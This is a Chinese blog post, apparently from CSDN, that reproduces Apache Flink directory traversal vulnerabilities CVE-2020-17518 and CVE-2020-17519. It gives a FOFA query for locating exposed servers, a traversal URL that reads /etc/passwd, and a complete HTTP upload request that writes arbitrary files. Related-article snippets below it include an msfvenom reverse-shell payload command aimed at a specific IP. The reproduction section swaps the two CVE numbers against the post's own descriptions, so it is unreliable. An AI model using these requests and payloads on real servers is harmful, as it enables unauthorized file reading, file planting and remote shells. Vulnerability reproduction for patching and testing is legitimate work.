Apache Flink目录遍历漏洞通过REST API读/写远程文件(CVE-2020-17518&&CVE-2020-17519)

最新推荐文章于 2024-07-08 08:18:08 发布
最新推荐文章于 2024-07-08 08:18:08 发布
阅读量703 收藏 2
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44146996/article/details/112265820
版权

fofa搜索

app=“APACHE-Flink”

漏洞编号:

CVE-2020-17518,CVE-2020-17519

漏洞描述:

CVE-2020-17518:通过REST API写入远程文件

受影响的版本:
Flink 1.5.1-1.11.2

Flink 1.5.1引入了REST API,可通过恶意修改的HTTP HEADER,将任意文件复制到文件系统的任意位置。

CVE-2020-17519:通过REST API读取远程文件

受影响的版本:
1.11.0、1.11.1、1.11.2

Apache Flink 1.11.0-1.11.2中引入的一项更改,允许攻击者通过JobManager进程的REST接口读取本地文件系统上的任何文件,访问仅限于JobManager进程可访问的文件。

漏洞复现

CVE-2020-17518

http://ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
在这里插入图片描述

CVE-2020-17519

构造数据包进行发送

POST /jars/upload HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187

------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"

success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

在这里插入图片描述

返回400,添加成功
http://ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsuccess
在这里插入图片描述

MD@@nr丫卡uer
关注
CVE-2020-17519:Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)
05-30
该脚本为Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)。 使用方法:Python CVE-2020-17519.py urls.txt urls.txt 中每个url为一行,漏洞地址输出在vul.txt中 影响版本: Apache Flink 1.11.0、1.11.1、...
Python 中文件的复制
weixin_41440707的博客
09-15 281
with open(r'D:\QQPCmgr\Desktop\ceshi.png','rb') as stream: conainer = stream.read() with open(r'D:\360\ceshi1.png', 'wb') as wstream: wstream.write(conainer) print('复制成功') Python中的文件复制有好几种形式,这里首先介绍的是通过方式复制文件,原理如下,先一个文件,然后对文件进行操作,这个文件。.
flink
zyzn1425077119的博客
10-29 201
参考:https://blog.csdn.net/lp284558195/article/details/92798595 https://baike.baidu.com/item/flink/9078426?fr=aladdin Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。 ...
Apache Flink任意JAR包上传漏洞分析与修复指南
最新发布
weixin_43822401的博客
07-08 596
漏洞允许未经授权的用户上传JAR文件,这些JAR文件可以在Flink集群上执行,可能导致远程代码执行(RCE)。Apache Flink的任意JAR包上传漏洞是一个严重的安全问题,需要立即采取措施进行修复。通过本文提供的分析和修复指南,可以帮助管理员和开发人员保护他们的Flink集群不受此漏洞的影响。
python对比两个文件夹中不同的文件
amazing_jack的博客
05-10 774
【代码】python对比两个文件夹中不同的文件
python 文件打开r_python文件打开方式详解——a、a+、r+、w+区别
weixin_39753397的博客
11-21 615
第一步 排除文件打开方式错误:r只,r+,不创建w新建只,w+新建,二者都会将文件内容清零(以w方式打开,不能出。w+可)**w+与r+区别:r+:可,若文件不存在,报错;w+: 可,若文件不存在,创建r+与a+区别:[python]fd=open("1.txt",'w+')fd.write('123')fd=open("1.txt",'r+')fd.writ...
Apache Flink 未授权访问+远程代码执行
Birdman-one的博客
12-11 2221
Apache Flink 未授权访问+远程代码执行 作者:Birdman-one 前言 近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围:<= 1.9.1(最新版本) 此次复现就是通过版本Version: 1.10.1进行复现利用。 FOFA FOFA 语句 app="Apache-Flink" && country="CN" app="Apache-Flink" && country="CN" &&am
Apache Flink目录遍历(CVE-2020-17519)批量检测脚本
09-24
2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的...
Apache Flink目录遍历(CVE-2020-17519)单目标检测工具
09-24
2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的...
Apache Flink CVE-2020-17518-id:L.pdf
04-30
CVE-2020-17518 是一个存在于 Apache Flink 中的安全漏洞,它允许远程攻击者通过 REST API 目录遍历来实现任意文件入的功能。这一漏洞Flink 1.5.1 版本中首次引入,并一直存在至 1.11.2 版本。攻击者可以通过...
python实现比对两个文件夹下的所有文件,将不同文件复制到文件夹3,相同文件复制到文件夹4
hxc0520的博客
01-03 1282
import os import shutil # 将in_path文件夹里的所有文件复制到out_path中 def copy_file(in_path, out_path): if not os.path.isdir(in_path): shutil.copy(in_path, out_path) else: if not os.path.exists(out_path): os.makedirs(out_path)
Apache Flink 未授权远程代码执行提权(实战)
失心少年
12-04 1276
1、fofa 搜索 app=“Apache-Flink” 可以看到有上千个 2、生成木马 下面展示一些 。 msfvenom -p java/meterpreter/reverse_tcp LHOST=47.103.79.70 LPORT=4444 -f jar > rce.jar 3、打开msf 进行如下配置,并进行监听 下面展示一些 。 3、上传刚才生成的木马,并执行 4、看到shell已经反弹回来 5、通过id 、 whoami 、cat /etc/passwd等命令查看当前用户及权
Python比较两个文件是否相同,去掉重复内容入到另一个文件
xiaobai1_1的博客
11-11 1765
Python比较两个文件是否相同,并输出相同内容,去掉重复内容入到另一个文件 #!/usr/bin/env python # -*- coding:utf-8 -*- def file_same(): str1 = [] file1 = open("D:/lunwen//Multi classification/data/t1ss-t8ss/T5SS/t5ss04.fasta","r",encoding="utf-8") for line in file1.readlines()
Python对比两个文件夹中子文件夹或文件的差异并查漏补缺
疯狂学习GIS的博客
02-21 1140
本文介绍基于Python语言,以一个大文件夹作为标准,对另一个大文件夹所包含的子文件夹或文件加以查漏补缺,并将查漏补缺的结果输出的方法~
python对比两个文件夹内容并同步差异
qq_30258721的博客
07-14 438
【代码】python对比两个文件夹内容并同步差异。
python识别两个文件夹中文件是否相同,将不同的提出来
weixin_42535423的博客
12-12 2923
较少文件夹 较多文件夹 import os import shutil from PIL import Image import numpy as np #判定两个文件夹内的文件是否相同 file_path1= './3-concreteCrackSegmentationDataset/rgb/' #已知 内容较少的文件file_path2 = './3-concreteCrackSegmentationDataset/BW/' f1 = [] f2 = [] for filename in os
【工具脚本】python比较两个目录文件差异、对比
linxinfa的专栏
05-15 9577
python代码如下,替换下aPath 和bPath为你要比较的文件夹路径即可 # -*-coding:utf-8-*- #=============================================================================== # 目录对比工具(包含子目录 ),并列出 # 1、A比B多了哪些文件 # 2、B比A多了哪些文...
Python判断两个文件夹中互相不同的文件有哪些、判断一个文件夹相对于另外一个文件夹缺少了哪些文件
data+scenario+science+insight
11-19 1097
Python判断两个文件夹中互相不同的文件有哪些、判断一个文件夹相对于另外一个文件夹缺少了哪些文件 目录 Python判断两个文件夹中互相不同的文件有哪些、判断一个文件夹相对于另外一个文件夹缺少了哪些文件 文件名称示例: #获取核心标识文本 #判断一个文件夹相对于另外一个文件夹缺少了哪些文件 文件名称示例: ZHANG_SAN_SAN_00000_9999999_12.25.88.99909045.456821.7843745.55608_33.nii.gz #而且前面.
Apache Flink CVE-2020-17518远程文件漏洞分析
"Apache FlinkCVE-2020-17518是一个严重的安全漏洞,它允许远程攻击者通过REST API进行目录遍历,从而实现任意文件入。此漏洞影响Apache Flink的1.5.1至1.11.2版本。攻击者可以通过构造特殊的HTTP请求头来将文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值